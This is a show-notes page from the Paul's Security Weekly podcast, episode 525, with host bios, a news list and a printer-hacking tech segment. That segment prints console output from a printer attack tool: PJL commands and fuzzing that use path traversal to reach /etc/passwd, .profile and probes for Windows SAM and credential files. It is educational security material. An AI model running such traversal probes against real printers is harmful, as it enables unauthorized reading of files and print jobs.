Episode525

From Paul's Security Weekly
Jump to: navigation, search

Paul's Security Weekly #525


Recorded August 10, 2017 at G-Unit Studios in Rhode Island!

Hosts

  • Paul Asadoorian
    Embedded device security researcher, security podcaster, and CEO of Active Countermeasures .
  • Larry Pesce
    Senior Managing Consultant and Director of Research at InGuardians, SANS Instructor.
  • Jack Daniel
    Works for Tenable Network Security and Co-Founder of Security BSides.
  • Jeff Man
    Cryptanalyst,
    infosec analyst, pioneering ex-NSA pen tester, PCI specialist & certified security curmudgeon.
    Currently a Sr. InfoSec Consultant for Online Business Systems.
  • Interview: Aram Jivanyan, BeSafe - 6:00PM-7:00PM

    Aram is a Cryptographer and Entrepreneur, PhD. Founding CEO of besafe.io, which is using proxy re-encryption techniques to protect user data.

    Tech Segment: Paul's Printer Hacking Adventures - 7:00-7:30PM

    Run PJL Commands:

    printer:/> site @PJL INFO STATUS
    CODE=10001
    DISPLAY="Ready"
    ONLINE=TRUE

    Debug mode shows you the underlying commands, very useful for learning more PJL and PS attacks:

    192.168.1.197:/> debug
    192.168.1.197:/> Debug mode on
    
    192.168.1.197:/> ls
    192.168.1.197:/> @PJL FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535
    No data received.
    

    Some printers just don't have a filesystem:

    printer:/> ls
    No data received.
    printer:/> ls ../..
    No data received.
    printer:/> info filesys
    "?"

    The "?" means there is no filesystem inside the firmware, according to the PJL documentation. And yes, I read the PJL documentation, it was awesome, you should read it too! #RTFMFTW

    You can't launch many "actual" attacks unless there is a file system, e.g. capturing print jobs. You can test for the precense of volumes like this:

    printer:/> info filesys
    VOLUME   TOTAL SIZE     FREE SPACE    LOCATION LABEL    STATUS
    0:            67092416Kbytes  67085856Kbytes    		    READ-WRITE


    You can also use the fuzz command:

    printer:/> fuzz path
    Checking base pathes first.
    PATH                                                     EXISTS  DIRLIST
    ────────────────────────────────────────────────────────────────────────
    0:/                                                      True    True   
    Listing directory.
    d        -   PJL
    d        -   PostScript
    d        -   saveDevice
    d        -   webServer
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
                                                             False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    .                                                        False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    \                                                        False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    /                                                        False   False  
    

    You can also fuzz for file names:

    printer:/> fuzz blind
    Blindly trying to read files.
    PATH                                                     GET     EXISTS 
    ────────────────────────────────────────────────────────────────────────
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\win.ini                                         False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\repair\sam                                      False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\repair\system                                   False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\system32\config\system.sav                      False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\System32\drivers\etc\hosts                      False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %SYSTEMDRIVE%\boot.ini                                   False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %USERPROFILE%\ntuser.dat                                 False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %SYSTEMDRIVE%\pagefile.sys                               False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %SYSTEMROOT%\repair\sam                                  False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %SYSTEMROOT%\repair\system                               False   False  
    ────────────────────────────────────────────────────────────────────────
    PJL Error: File not found
    PJL Error: File not found
    0:/.profile                                              False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/../.profile                                           False   False  
    0:/../../.profile                                        True    True   
    PJL Error: File not found
    PJL Error: File not found
    0:/.../.profile                                          False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/.../.../.profile                                      False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/..../.profile                                         False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/..../..../.profile                                    False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/etc/passwd                                            False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/../etc/passwd                                         False   False  
    0:/../../etc/passwd                                      True    True   
    

    Resources

    Security News - 7:30-8:30PM

    Paul's Stories

    1. Mystery Company Offers $250,000 Bounty for VM Escape Vulnerabilities
    2. Hacker Marcus Hutchins To Plead Not Guilty To Malware Development
    3. Password Guru Regrets Past Advice
    4. Salesforce Sacks Security Engineers For Their Defcon Talk
    5. .why .its .time .to .fix .localhost
    6. Juniper Issues Security Alert Tied to Routers and Switches
    7. Dropbox Adds an Offline Way to Do Two-Factor Authentication
    8. Patched Flash Player Sandbox Escape Leaked Windows Credentials
    9. BeyondTrust Delivers a Privileged Access Management Platform Available on Google Cloud
    10. Tech Support Scammers Cast a Wider Net
    11. Are You Ready for Your Pen Test?
    12. Automating Defenses Against Assembly-Line Attacks
    13. Microsoft issues out-of-band security updates for Outlook, Office

    Larry's Stories

    1. Sales forced out
    2. CarbonBlack leaking data? - [ https://www.carbonblack.com/2017/08/09/directdefense-incorrectly-asserts-architectural-flaw-in-cb-response/ ....and their response]
    3. WiFi Deauther on the cheap
    4. the week of evading MS ATA - Remember back in the day when the week of/month of was a thing?
    5. Malware hidden in synthetic DNA - What the actual fsck.....

    Jeff's Stories

    1. Speaking of Bob and Alice...